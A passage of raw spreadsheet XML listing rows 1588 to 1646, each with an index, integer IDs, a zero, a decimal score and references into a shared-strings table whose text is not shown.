      </c>
    </row>
    <row r="1588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1588" s="1">
        <v>1586</v>
      </c>
      <c r="B1588">
        <v>731</v>
      </c>
      <c r="C1588">
        <v>731</v>
      </c>
      <c r="D1588">
        <v>0</v>
      </c>
      <c r="E1588">
        <v>0.44470000267028809</v>
      </c>
      <c r="F1588" t="s">
        <v>7</v>
      </c>
      <c r="G1588" t="s">
        <v>3135</v>
      </c>
      <c r="H1588" t="s">
        <v>3136</v>
      </c>
    </row>
    <row r="1589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1589" s="1">
        <v>1587</v>
      </c>
      <c r="B1589">
        <v>718</v>
      </c>
      <c r="C1589">
        <v>718</v>
      </c>
      <c r="D1589">
        <v>0</v>
      </c>
      <c r="E1589">
        <v>0.99250000715255737</v>
      </c>
      <c r="F1589" t="s">
        <v>7</v>
      </c>
      <c r="G1589" t="s">
        <v>3137</v>
      </c>
      <c r="H1589" t="s">
        <v>3138</v>
      </c>
    </row>
    <row r="1590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1590" s="1">
        <v>1588</v>
      </c>
      <c r="B1590">
        <v>5448</v>
      </c>
      <c r="C1590">
        <v>5448</v>
      </c>
      <c r="D1590">
        <v>0</v>
      </c>
      <c r="E1590">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1590" t="s">
        <v>7</v>
      </c>
      <c r="G1590" t="s">
        <v>3139</v>
      </c>
      <c r="H1590" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="1591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1591" s="1">
        <v>1589</v>
      </c>
      <c r="B1591">
        <v>219</v>
      </c>
      <c r="C1591">
        <v>219</v>
      </c>
      <c r="D1591">
        <v>0</v>
      </c>
      <c r="E1591">
        <v>0.77249997854232788</v>
      </c>
      <c r="F1591" t="s">
        <v>7</v>
      </c>
      <c r="G1591" t="s">
        <v>3140</v>
      </c>
      <c r="H1591" t="s">
        <v>3141</v>
      </c>
    </row>
    <row r="1592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1592" s="1">
        <v>1590</v>
      </c>
      <c r="B1592">
        <v>5228</v>
      </c>
      <c r="C1592">
        <v>5228</v>
      </c>
      <c r="D1592">
        <v>0</v>
      </c>
      <c r="E1592">
        <v>0.75160002708435059</v>
      </c>
      <c r="F1592" t="s">
        <v>7</v>
      </c>
      <c r="G1592" t="s">
        <v>3142</v>
      </c>
      <c r="H1592" t="s">
        <v>3143</v>
      </c>
    </row>
    <row r="1593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1593" s="1">
        <v>1591</v>
      </c>
      <c r="B1593">
        <v>714</v>
      </c>
      <c r="C1593">
        <v>714</v>
      </c>
      <c r="D1593">
        <v>0</v>
      </c>
      <c r="E1593">
        <v>0.99779999256134033</v>
      </c>
      <c r="F1593" t="s">
        <v>7</v>
      </c>
      <c r="G1593" t="s">
        <v>3144</v>
      </c>
      <c r="H1593" t="s">
        <v>3145</v>
      </c>
    </row>
    <row r="1594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1594" s="1">
        <v>1592</v>
      </c>
      <c r="B1594">
        <v>7595</v>
      </c>
      <c r="C1594">
        <v>7595</v>
      </c>
      <c r="D1594">
        <v>0</v>
      </c>
      <c r="E1594">
        <v>0.49939998984336847</v>
      </c>
      <c r="F1594" t="s">
        <v>7</v>
      </c>
      <c r="G1594" t="s">
        <v>3146</v>
      </c>
      <c r="H1594" t="s">
        <v>3147</v>
      </c>
    </row>
    <row r="1595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1595" s="1">
        <v>1593</v>
      </c>
      <c r="B1595">
        <v>5734</v>
      </c>
      <c r="C1595">
        <v>5734</v>
      </c>
      <c r="D1595">
        <v>0</v>
      </c>
      <c r="E1595">
        <v>0.93610000610351563</v>
      </c>
      <c r="F1595" t="s">
        <v>7</v>
      </c>
      <c r="G1595" t="s">
        <v>3148</v>
      </c>
      <c r="H1595" t="s">
        <v>3149</v>
      </c>
    </row>
    <row r="1596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1596" s="1">
        <v>1594</v>
      </c>
      <c r="B1596">
        <v>235</v>
      </c>
      <c r="C1596">
        <v>235</v>
      </c>
      <c r="D1596">
        <v>0</v>
      </c>
      <c r="E1596">
        <v>0.76520001888275146</v>
      </c>
      <c r="F1596" t="s">
        <v>7</v>
      </c>
      <c r="G1596" t="s">
        <v>3150</v>
      </c>
      <c r="H1596" t="s">
        <v>3151</v>
      </c>
    </row>
    <row r="1597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1597" s="1">
        <v>1595</v>
      </c>
      <c r="B1597">
        <v>5206</v>
      </c>
      <c r="C1597">
        <v>5206</v>
      </c>
      <c r="D1597">
        <v>0</v>
      </c>
      <c r="E1597">
        <v>0.55889999866485596</v>
      </c>
      <c r="F1597" t="s">
        <v>7</v>
      </c>
      <c r="G1597" t="s">
        <v>3152</v>
      </c>
      <c r="H1597" t="s">
        <v>3153</v>
      </c>
    </row>
    <row r="1598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1598" s="1">
        <v>1596</v>
      </c>
      <c r="B1598">
        <v>5733</v>
      </c>
      <c r="C1598">
        <v>5733</v>
      </c>
      <c r="D1598">
        <v>0</v>
      </c>
      <c r="E1598">
        <v>0.55750000476837158</v>
      </c>
      <c r="F1598" t="s">
        <v>7</v>
      </c>
      <c r="G1598" t="s">
        <v>3154</v>
      </c>
      <c r="H1598" t="s">
        <v>3155</v>
      </c>
    </row>
    <row r="1599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1599" s="1">
        <v>1597</v>
      </c>
      <c r="B1599">
        <v>7830</v>
      </c>
      <c r="C1599">
        <v>7830</v>
      </c>
      <c r="D1599">
        <v>0</v>
      </c>
      <c r="E1599">
        <v>0.7279999852180481</v>
      </c>
      <c r="F1599" t="s">
        <v>7</v>
      </c>
      <c r="G1599" t="s">
        <v>3156</v>
      </c>
      <c r="H1599" t="s">
        <v>3157</v>
      </c>
    </row>
    <row r="1600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1600" s="1">
        <v>1598</v>
      </c>
      <c r="B1600">
        <v>717</v>
      </c>
      <c r="C1600">
        <v>717</v>
      </c>
      <c r="D1600">
        <v>0</v>
      </c>
      <c r="E1600">
        <v>0.99250000715255737</v>
      </c>
      <c r="F1600" t="s">
        <v>7</v>
      </c>
      <c r="G1600" t="s">
        <v>3158</v>
      </c>
      <c r="H1600" t="s">
        <v>3138</v>
      </c>
    </row>
    <row r="1601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1601" s="1">
        <v>1599</v>
      </c>
      <c r="B1601">
        <v>5264</v>
      </c>
      <c r="C1601">
        <v>5264</v>
      </c>
      <c r="D1601">
        <v>0</v>
      </c>
      <c r="E1601">
        <v>0.99199998378753662</v>
      </c>
      <c r="F1601" t="s">
        <v>7</v>
      </c>
      <c r="G1601" t="s">
        <v>3159</v>
      </c>
      <c r="H1601" t="s">
        <v>3160</v>
      </c>
    </row>
    <row r="1602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1602" s="1">
        <v>1600</v>
      </c>
      <c r="B1602">
        <v>7646</v>
      </c>
      <c r="C1602">
        <v>7646</v>
      </c>
      <c r="D1602">
        <v>0</v>
      </c>
      <c r="E1602">
        <v>0.72740000486373901</v>
      </c>
      <c r="F1602" t="s">
        <v>7</v>
      </c>
      <c r="G1602" t="s">
        <v>3161</v>
      </c>
      <c r="H1602" t="s">
        <v>3162</v>
      </c>
    </row>
    <row r="1603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1603" s="1">
        <v>1601</v>
      </c>
      <c r="B1603">
        <v>7561</v>
      </c>
      <c r="C1603">
        <v>7561</v>
      </c>
      <c r="D1603">
        <v>0</v>
      </c>
      <c r="E1603">
        <v>0.47549998760223389</v>
      </c>
      <c r="F1603" t="s">
        <v>7</v>
      </c>
      <c r="G1603" t="s">
        <v>3163</v>
      </c>
      <c r="H1603" t="s">
        <v>3164</v>
      </c>
    </row>
    <row r="1604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1604" s="1">
        <v>1602</v>
      </c>
      <c r="B1604">
        <v>161</v>
      </c>
      <c r="C1604">
        <v>161</v>
      </c>
      <c r="D1604">
        <v>0</v>
      </c>
      <c r="E1604">
        <v>0.46050000190734858</v>
      </c>
      <c r="F1604" t="s">
        <v>7</v>
      </c>
      <c r="G1604" t="s">
        <v>3165</v>
      </c>
      <c r="H1604" t="s">
        <v>3166</v>
      </c>
    </row>
    <row r="1605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1605" s="1">
        <v>1603</v>
      </c>
      <c r="B1605">
        <v>596</v>
      </c>
      <c r="C1605">
        <v>596</v>
      </c>
      <c r="D1605">
        <v>0</v>
      </c>
      <c r="E1605">
        <v>0.58259999752044678</v>
      </c>
      <c r="F1605" t="s">
        <v>7</v>
      </c>
      <c r="G1605" t="s">
        <v>3167</v>
      </c>
      <c r="H1605" t="s">
        <v>3168</v>
      </c>
    </row>
    <row r="1606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1606" s="1">
        <v>1604</v>
      </c>
      <c r="B1606">
        <v>164</v>
      </c>
      <c r="C1606">
        <v>164</v>
      </c>
      <c r="D1606">
        <v>0</v>
      </c>
      <c r="E1606">
        <v>0.60240000486373901</v>
      </c>
      <c r="F1606" t="s">
        <v>7</v>
      </c>
      <c r="G1606" t="s">
        <v>3169</v>
      </c>
      <c r="H1606" t="s">
        <v>3170</v>
      </c>
    </row>
    <row r="1607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1607" s="1">
        <v>1605</v>
      </c>
      <c r="B1607">
        <v>7535</v>
      </c>
      <c r="C1607">
        <v>7535</v>
      </c>
      <c r="D1607">
        <v>0</v>
      </c>
      <c r="E1607">
        <v>0.58300000429153442</v>
      </c>
      <c r="F1607" t="s">
        <v>7</v>
      </c>
      <c r="G1607" t="s">
        <v>3171</v>
      </c>
      <c r="H1607" t="s">
        <v>3172</v>
      </c>
    </row>
    <row r="1608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1608" s="1">
        <v>1606</v>
      </c>
      <c r="B1608">
        <v>828</v>
      </c>
      <c r="C1608">
        <v>828</v>
      </c>
      <c r="D1608">
        <v>0</v>
      </c>
      <c r="E1608">
        <v>0.56139999628067017</v>
      </c>
      <c r="F1608" t="s">
        <v>7</v>
      </c>
      <c r="G1608" t="s">
        <v>3173</v>
      </c>
      <c r="H1608" t="s">
        <v>3174</v>
      </c>
    </row>
    <row r="1609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1609" s="1">
        <v>1607</v>
      </c>
      <c r="B1609">
        <v>5140</v>
      </c>
      <c r="C1609">
        <v>5140</v>
      </c>
      <c r="D1609">
        <v>0</v>
      </c>
      <c r="E1609">
        <v>0.91570001840591431</v>
      </c>
      <c r="F1609" t="s">
        <v>7</v>
      </c>
      <c r="G1609" t="s">
        <v>3175</v>
      </c>
      <c r="H1609" t="s">
        <v>3176</v>
      </c>
    </row>
    <row r="1610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1610" s="1">
        <v>1608</v>
      </c>
      <c r="B1610">
        <v>263</v>
      </c>
      <c r="C1610">
        <v>263</v>
      </c>
      <c r="D1610">
        <v>0</v>
      </c>
      <c r="E1610">
        <v>0.52929997444152832</v>
      </c>
      <c r="F1610" t="s">
        <v>7</v>
      </c>
      <c r="G1610" t="s">
        <v>3177</v>
      </c>
      <c r="H1610" t="s">
        <v>3178</v>
      </c>
    </row>
    <row r="1611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1611" s="1">
        <v>1609</v>
      </c>
      <c r="B1611">
        <v>598</v>
      </c>
      <c r="C1611">
        <v>598</v>
      </c>
      <c r="D1611">
        <v>0</v>
      </c>
      <c r="E1611">
        <v>0.86559998989105225</v>
      </c>
      <c r="F1611" t="s">
        <v>7</v>
      </c>
      <c r="G1611" t="s">
        <v>3179</v>
      </c>
      <c r="H1611" t="s">
        <v>3180</v>
      </c>
    </row>
    <row r="1612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1612" s="1">
        <v>1610</v>
      </c>
      <c r="B1612">
        <v>599</v>
      </c>
      <c r="C1612">
        <v>599</v>
      </c>
      <c r="D1612">
        <v>0</v>
      </c>
      <c r="E1612">
        <v>0.75190001726150513</v>
      </c>
      <c r="F1612" t="s">
        <v>7</v>
      </c>
      <c r="G1612" t="s">
        <v>3181</v>
      </c>
      <c r="H1612" t="s">
        <v>3182</v>
      </c>
    </row>
    <row r="1613" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1613" s="1">
        <v>1611</v>
      </c>
      <c r="B1613">
        <v>7662</v>
      </c>
      <c r="C1613">
        <v>7662</v>
      </c>
      <c r="D1613">
        <v>0</v>
      </c>
      <c r="E1613">
        <v>0.50749999284744263</v>
      </c>
      <c r="F1613" t="s">
        <v>7</v>
      </c>
      <c r="G1613" t="s">
        <v>3183</v>
      </c>
      <c r="H1613" t="s">
        <v>3184</v>
      </c>
    </row>
    <row r="1614" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1614" s="1">
        <v>1612</v>
      </c>
      <c r="B1614">
        <v>601</v>
      </c>
      <c r="C1614">
        <v>601</v>
      </c>
      <c r="D1614">
        <v>0</v>
      </c>
      <c r="E1614">
        <v>0.50160002708435059</v>
      </c>
      <c r="F1614" t="s">
        <v>7</v>
      </c>
      <c r="G1614" t="s">
        <v>3185</v>
      </c>
      <c r="H1614" t="s">
        <v>3186</v>
      </c>
    </row>
    <row r="1615" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1615" s="1">
        <v>1613</v>
      </c>
      <c r="B1615">
        <v>5142</v>
      </c>
      <c r="C1615">
        <v>5142</v>
      </c>
      <c r="D1615">
        <v>0</v>
      </c>
      <c r="E1615">
        <v>0.61059999465942383</v>
      </c>
      <c r="F1615" t="s">
        <v>7</v>
      </c>
      <c r="G1615" t="s">
        <v>3187</v>
      </c>
      <c r="H1615" t="s">
        <v>3188</v>
      </c>
    </row>
    <row r="1616" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1616" s="1">
        <v>1614</v>
      </c>
      <c r="B1616">
        <v>7853</v>
      </c>
      <c r="C1616">
        <v>7853</v>
      </c>
      <c r="D1616">
        <v>0</v>
      </c>
      <c r="E1616">
        <v>0.7937999963760376</v>
      </c>
      <c r="F1616" t="s">
        <v>7</v>
      </c>
      <c r="G1616" t="s">
        <v>3189</v>
      </c>
      <c r="H1616" t="s">
        <v>3190</v>
      </c>
    </row>
    <row r="1617" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1617" s="1">
        <v>1615</v>
      </c>
      <c r="B1617">
        <v>605</v>
      </c>
      <c r="C1617">
        <v>605</v>
      </c>
      <c r="D1617">
        <v>0</v>
      </c>
      <c r="E1617">
        <v>0.53250002861022949</v>
      </c>
      <c r="F1617" t="s">
        <v>7</v>
      </c>
      <c r="G1617" t="s">
        <v>3191</v>
      </c>
      <c r="H1617" t="s">
        <v>3192</v>
      </c>
    </row>
    <row r="1618" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1618" s="1">
        <v>1616</v>
      </c>
      <c r="B1618">
        <v>168</v>
      </c>
      <c r="C1618">
        <v>168</v>
      </c>
      <c r="D1618">
        <v>0</v>
      </c>
      <c r="E1618">
        <v>0.55800002813339233</v>
      </c>
      <c r="F1618" t="s">
        <v>7</v>
      </c>
      <c r="G1618" t="s">
        <v>3193</v>
      </c>
      <c r="H1618" t="s">
        <v>3194</v>
      </c>
    </row>
    <row r="1619" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1619" s="1">
        <v>1617</v>
      </c>
      <c r="B1619">
        <v>822</v>
      </c>
      <c r="C1619">
        <v>822</v>
      </c>
      <c r="D1619">
        <v>0</v>
      </c>
      <c r="E1619">
        <v>0.82829999923706055</v>
      </c>
      <c r="F1619" t="s">
        <v>7</v>
      </c>
      <c r="G1619" t="s">
        <v>3195</v>
      </c>
      <c r="H1619" t="s">
        <v>3196</v>
      </c>
    </row>
    <row r="1620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1620" s="1">
        <v>1618</v>
      </c>
      <c r="B1620">
        <v>5433</v>
      </c>
      <c r="C1620">
        <v>5433</v>
      </c>
      <c r="D1620">
        <v>0</v>
      </c>
      <c r="E1620">
        <v>0.97630000114440918</v>
      </c>
      <c r="F1620" t="s">
        <v>7</v>
      </c>
      <c r="G1620" t="s">
        <v>3197</v>
      </c>
      <c r="H1620" t="s">
        <v>3198</v>
      </c>
    </row>
    <row r="1621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1621" s="1">
        <v>1619</v>
      </c>
      <c r="B1621">
        <v>170</v>
      </c>
      <c r="C1621">
        <v>170</v>
      </c>
      <c r="D1621">
        <v>0</v>
      </c>
      <c r="E1621">
        <v>0.62660002708435059</v>
      </c>
      <c r="F1621" t="s">
        <v>7</v>
      </c>
      <c r="G1621" t="s">
        <v>3199</v>
      </c>
      <c r="H1621" t="s">
        <v>3200</v>
      </c>
    </row>
    <row r="1622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1622" s="1">
        <v>1620</v>
      </c>
      <c r="B1622">
        <v>5609</v>
      </c>
      <c r="C1622">
        <v>5609</v>
      </c>
      <c r="D1622">
        <v>0</v>
      </c>
      <c r="E1622">
        <v>0.74830001592636108</v>
      </c>
      <c r="F1622" t="s">
        <v>7</v>
      </c>
      <c r="G1622" t="s">
        <v>3201</v>
      </c>
      <c r="H1622" t="s">
        <v>3202</v>
      </c>
    </row>
    <row r="1623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1623" s="1">
        <v>1621</v>
      </c>
      <c r="B1623">
        <v>7660</v>
      </c>
      <c r="C1623">
        <v>7660</v>
      </c>
      <c r="D1623">
        <v>0</v>
      </c>
      <c r="E1623">
        <v>0.58060002326965332</v>
      </c>
      <c r="F1623" t="s">
        <v>7</v>
      </c>
      <c r="G1623" t="s">
        <v>3203</v>
      </c>
      <c r="H1623" t="s">
        <v>3204</v>
      </c>
    </row>
    <row r="1624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1624" s="1">
        <v>1622</v>
      </c>
      <c r="B1624">
        <v>820</v>
      </c>
      <c r="C1624">
        <v>820</v>
      </c>
      <c r="D1624">
        <v>0</v>
      </c>
      <c r="E1624">
        <v>0.99409997463226318</v>
      </c>
      <c r="F1624" t="s">
        <v>7</v>
      </c>
      <c r="G1624" t="s">
        <v>3205</v>
      </c>
      <c r="H1624" t="s">
        <v>3206</v>
      </c>
    </row>
    <row r="1625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1625" s="1">
        <v>1623</v>
      </c>
      <c r="B1625">
        <v>159</v>
      </c>
      <c r="C1625">
        <v>159</v>
      </c>
      <c r="D1625">
        <v>0</v>
      </c>
      <c r="E1625">
        <v>0.57400000095367432</v>
      </c>
      <c r="F1625" t="s">
        <v>7</v>
      </c>
      <c r="G1625" t="s">
        <v>3207</v>
      </c>
      <c r="H1625" t="s">
        <v>3208</v>
      </c>
    </row>
    <row r="1626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1626" s="1">
        <v>1624</v>
      </c>
      <c r="B1626">
        <v>5760</v>
      </c>
      <c r="C1626">
        <v>5760</v>
      </c>
      <c r="D1626">
        <v>0</v>
      </c>
      <c r="E1626">
        <v>0.71890002489089966</v>
      </c>
      <c r="F1626" t="s">
        <v>7</v>
      </c>
      <c r="G1626" t="s">
        <v>3209</v>
      </c>
      <c r="H1626" t="s">
        <v>3210</v>
      </c>
    </row>
    <row r="1627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1627" s="1">
        <v>1625</v>
      </c>
      <c r="B1627">
        <v>158</v>
      </c>
      <c r="C1627">
        <v>158</v>
      </c>
      <c r="D1627">
        <v>0</v>
      </c>
      <c r="E1627">
        <v>0.62940001487731934</v>
      </c>
      <c r="F1627" t="s">
        <v>7</v>
      </c>
      <c r="G1627" t="s">
        <v>3211</v>
      </c>
      <c r="H1627" t="s">
        <v>3212</v>
      </c>
    </row>
    <row r="1628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1628" s="1">
        <v>1626</v>
      </c>
      <c r="B1628">
        <v>5606</v>
      </c>
      <c r="C1628">
        <v>5606</v>
      </c>
      <c r="D1628">
        <v>0</v>
      </c>
      <c r="E1628">
        <v>0.9496999979019165</v>
      </c>
      <c r="F1628" t="s">
        <v>7</v>
      </c>
      <c r="G1628" t="s">
        <v>3213</v>
      </c>
      <c r="H1628" t="s">
        <v>3214</v>
      </c>
    </row>
    <row r="1629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1629" s="1">
        <v>1627</v>
      </c>
      <c r="B1629">
        <v>5261</v>
      </c>
      <c r="C1629">
        <v>5261</v>
      </c>
      <c r="D1629">
        <v>0</v>
      </c>
      <c r="E1629">
        <v>0.50160002708435059</v>
      </c>
      <c r="F1629" t="s">
        <v>7</v>
      </c>
      <c r="G1629" t="s">
        <v>3215</v>
      </c>
      <c r="H1629" t="s">
        <v>3216</v>
      </c>
    </row>
    <row r="1630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1630" s="1">
        <v>1628</v>
      </c>
      <c r="B1630">
        <v>856</v>
      </c>
      <c r="C1630">
        <v>856</v>
      </c>
      <c r="D1630">
        <v>0</v>
      </c>
      <c r="E1630">
        <v>0.98989999294281006</v>
      </c>
      <c r="F1630" t="s">
        <v>7</v>
      </c>
      <c r="G1630" t="s">
        <v>3217</v>
      </c>
      <c r="H1630" t="s">
        <v>3218</v>
      </c>
    </row>
    <row r="1631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1631" s="1">
        <v>1629</v>
      </c>
      <c r="B1631">
        <v>5260</v>
      </c>
      <c r="C1631">
        <v>5260</v>
      </c>
      <c r="D1631">
        <v>0</v>
      </c>
      <c r="E1631">
        <v>0.60519999265670776</v>
      </c>
      <c r="F1631" t="s">
        <v>7</v>
      </c>
      <c r="G1631" t="s">
        <v>3219</v>
      </c>
      <c r="H1631" t="s">
        <v>3220</v>
      </c>
    </row>
    <row r="1632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1632" s="1">
        <v>1630</v>
      </c>
      <c r="B1632">
        <v>7670</v>
      </c>
      <c r="C1632">
        <v>7670</v>
      </c>
      <c r="D1632">
        <v>0</v>
      </c>
      <c r="E1632">
        <v>0.62510001659393311</v>
      </c>
      <c r="F1632" t="s">
        <v>7</v>
      </c>
      <c r="G1632" t="s">
        <v>3221</v>
      </c>
      <c r="H1632" t="s">
        <v>3222</v>
      </c>
    </row>
    <row r="1633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1633" s="1">
        <v>1631</v>
      </c>
      <c r="B1633">
        <v>855</v>
      </c>
      <c r="C1633">
        <v>855</v>
      </c>
      <c r="D1633">
        <v>0</v>
      </c>
      <c r="E1633">
        <v>0.76469999551773071</v>
      </c>
      <c r="F1633" t="s">
        <v>7</v>
      </c>
      <c r="G1633" t="s">
        <v>3223</v>
      </c>
      <c r="H1633" t="s">
        <v>3224</v>
      </c>
    </row>
    <row r="1634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1634" s="1">
        <v>1632</v>
      </c>
      <c r="B1634">
        <v>854</v>
      </c>
      <c r="C1634">
        <v>854</v>
      </c>
      <c r="D1634">
        <v>0</v>
      </c>
      <c r="E1634">
        <v>0.61180001497268677</v>
      </c>
      <c r="F1634" t="s">
        <v>7</v>
      </c>
      <c r="G1634" t="s">
        <v>3225</v>
      </c>
      <c r="H1634" t="s">
        <v>3226</v>
      </c>
    </row>
    <row r="1635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1635" s="1">
        <v>1633</v>
      </c>
      <c r="B1635">
        <v>853</v>
      </c>
      <c r="C1635">
        <v>853</v>
      </c>
      <c r="D1635">
        <v>0</v>
      </c>
      <c r="E1635">
        <v>0.71139997243881226</v>
      </c>
      <c r="F1635" t="s">
        <v>7</v>
      </c>
      <c r="G1635" t="s">
        <v>3227</v>
      </c>
      <c r="H1635" t="s">
        <v>3228</v>
      </c>
    </row>
    <row r="1636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1636" s="1">
        <v>1634</v>
      </c>
      <c r="B1636">
        <v>7669</v>
      </c>
      <c r="C1636">
        <v>7669</v>
      </c>
      <c r="D1636">
        <v>0</v>
      </c>
      <c r="E1636">
        <v>0.97450000047683716</v>
      </c>
      <c r="F1636" t="s">
        <v>7</v>
      </c>
      <c r="G1636" t="s">
        <v>3229</v>
      </c>
      <c r="H1636" t="s">
        <v>3230</v>
      </c>
    </row>
    <row r="1637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1637" s="1">
        <v>1635</v>
      </c>
      <c r="B1637">
        <v>7668</v>
      </c>
      <c r="C1637">
        <v>7668</v>
      </c>
      <c r="D1637">
        <v>0</v>
      </c>
      <c r="E1637">
        <v>0.74550002813339233</v>
      </c>
      <c r="F1637" t="s">
        <v>7</v>
      </c>
      <c r="G1637" t="s">
        <v>3231</v>
      </c>
      <c r="H1637" t="s">
        <v>3232</v>
      </c>
    </row>
    <row r="1638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1638" s="1">
        <v>1636</v>
      </c>
      <c r="B1638">
        <v>5431</v>
      </c>
      <c r="C1638">
        <v>5431</v>
      </c>
      <c r="D1638">
        <v>0</v>
      </c>
      <c r="E1638">
        <v>0.96990001201629639</v>
      </c>
      <c r="F1638" t="s">
        <v>7</v>
      </c>
      <c r="G1638" t="s">
        <v>3233</v>
      </c>
      <c r="H1638" t="s">
        <v>1322</v>
      </c>
    </row>
    <row r="1639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1639" s="1">
        <v>1637</v>
      </c>
      <c r="B1639">
        <v>608</v>
      </c>
      <c r="C1639">
        <v>608</v>
      </c>
      <c r="D1639">
        <v>0</v>
      </c>
      <c r="E1639">
        <v>0.29940000176429749</v>
      </c>
      <c r="F1639" t="s">
        <v>7</v>
      </c>
      <c r="G1639" t="s">
        <v>3234</v>
      </c>
      <c r="H1639" t="s">
        <v>3235</v>
      </c>
    </row>
    <row r="1640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1640" s="1">
        <v>1638</v>
      </c>
      <c r="B1640">
        <v>5769</v>
      </c>
      <c r="C1640">
        <v>5769</v>
      </c>
      <c r="D1640">
        <v>0</v>
      </c>
      <c r="E1640">
        <v>0.95080000162124634</v>
      </c>
      <c r="F1640" t="s">
        <v>7</v>
      </c>
      <c r="G1640" t="s">
        <v>3236</v>
      </c>
      <c r="H1640" t="s">
        <v>3237</v>
      </c>
    </row>
    <row r="1641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1641" s="1">
        <v>1639</v>
      </c>
      <c r="B1641">
        <v>7667</v>
      </c>
      <c r="C1641">
        <v>7667</v>
      </c>
      <c r="D1641">
        <v>0</v>
      </c>
      <c r="E1641">
        <v>0.75720000267028809</v>
      </c>
      <c r="F1641" t="s">
        <v>7</v>
      </c>
      <c r="G1641" t="s">
        <v>3238</v>
      </c>
      <c r="H1641" t="s">
        <v>3239</v>
      </c>
    </row>
    <row r="1642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1642" s="1">
        <v>1640</v>
      </c>
      <c r="B1642">
        <v>845</v>
      </c>
      <c r="C1642">
        <v>845</v>
      </c>
      <c r="D1642">
        <v>0</v>
      </c>
      <c r="E1642">
        <v>0.44490000605583191</v>
      </c>
      <c r="F1642" t="s">
        <v>7</v>
      </c>
      <c r="G1642" t="s">
        <v>3240</v>
      </c>
      <c r="H1642" t="s">
        <v>3241</v>
      </c>
    </row>
    <row r="1643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1643" s="1">
        <v>1641</v>
      </c>
      <c r="B1643">
        <v>5128</v>
      </c>
      <c r="C1643">
        <v>5128</v>
      </c>
      <c r="D1643">
        <v>0</v>
      </c>
      <c r="E1643">
        <v>0.94090002775192261</v>
      </c>
      <c r="F1643" t="s">
        <v>7</v>
      </c>
      <c r="G1643" t="s">
        <v>3242</v>
      </c>
      <c r="H1643" t="s">
        <v>3243</v>
      </c>
    </row>
    <row r="1644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1644" s="1">
        <v>1642</v>
      </c>
      <c r="B1644">
        <v>842</v>
      </c>
      <c r="C1644">
        <v>842</v>
      </c>
      <c r="D1644">
        <v>0</v>
      </c>
      <c r="E1644">
        <v>0.69160002470016479</v>
      </c>
      <c r="F1644" t="s">
        <v>7</v>
      </c>
      <c r="G1644" t="s">
        <v>3244</v>
      </c>
      <c r="H1644" t="s">
        <v>3245</v>
      </c>
    </row>
    <row r="1645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1645" s="1">
        <v>1643</v>
      </c>
      <c r="B1645">
        <v>266</v>
      </c>
      <c r="C1645">
        <v>266</v>
      </c>
      <c r="D1645">
        <v>0</v>
      </c>
      <c r="E1645">
        <v>0.99529999494552612</v>
      </c>
      <c r="F1645" t="s">
        <v>7</v>
      </c>
      <c r="G1645" t="s">
        <v>3246</v>
      </c>
      <c r="H1645" t="s">
        <v>3247</v>
      </c>
    </row>
    <row r="1646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1646" s="1">
        <v>1644</v>
      </c>
      <c r="B1646">
        <v>5763</v>
      </c>
      <c r="C1646">
        <v>5763</v>
      </c>
      <c r="D1646">
        <v>0</v>
      </c>
      <c r="E1646">
        <v>0.90829998254776001</v>
      </c>
      <c r="F1646" t="s">
        <v>7</v>
      </c>
